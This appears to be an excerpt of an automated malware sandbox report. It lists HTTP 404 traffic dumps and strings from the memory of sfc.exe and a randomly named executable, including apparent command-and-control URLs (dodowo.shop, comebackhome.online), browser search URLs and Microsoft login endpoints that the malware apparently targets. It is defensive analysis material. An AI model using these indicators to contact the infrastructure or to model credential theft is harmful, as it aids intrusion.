ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:35:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PE6091aMF4JKeXmje4AGl0KTg6besKnVuXqzb78gdyFGAGFWfhp465l%2Bbv3EAKhyhJv7F7nXD2eYrLErhZv4d1cso%2FBJ5JL7RT4rzOT6w3T3HYc01vsr%2B2VFCm8Fveau2TfC%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd90742cf2c32e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2435&min_rtt=2435&rtt_var=1217&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=743&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:35:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4jJYWBqcHCEhMpWigJAfoXHfH3dZKGJ%2BonM8tN%2FTgEXuf2qBpsqPqpBFENO7ngWZCyJ7z9QaSPkgWxAh95o8uuzWx4PN%2Fzk0k44BprQf2b58ay7Bngv2Q83X9cW%2FNqj0g9%2F1g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd90841bddc32e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=2&recv=7&lost=0&retrans=0&sent_bytes=0&recv_bytes=7000&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:35:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7aZBT2Ts5zefxtZIc%2Byvfk3C09Nzml6QsXoK%2Bk33bTiI4HGlroynkZvcmxwf7DI8zb3Rq7dqGjpYB3yMtj3BXOcuJrL1HNJtnhic9OU6IZiaHyABRmDIJuq4CxbyVRi2bHSQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd9094fab7eeee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=73011&min_rtt=73011&rtt_var=36505&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=94&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a paddi
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:35:47 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:35:50 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 22:36:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 22:37:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 22:37:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: sfc.exe, 00000009.00000002.3636474605.0000000004E5E000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000046CE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dodowo.shop/8g01/?7v=FK1b7Kdc3jRmrp0mexgHyQ1hd3sVrC8
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3636979732.0000000005327000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comebackhome.online
                Source: p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3636979732.0000000005327000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comebackhome.online/dv29/
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sfc.exe, 00000009.00000003.1688623782.0000000007838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033s
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sfc.exe, 00000009.00000003.1680454092.0000000007803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: sfc.exe, 00000009.00000002.3638070979.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3636474605.0000000004B3A000.00000004.10000000.00040000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3635344769.00000000043AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
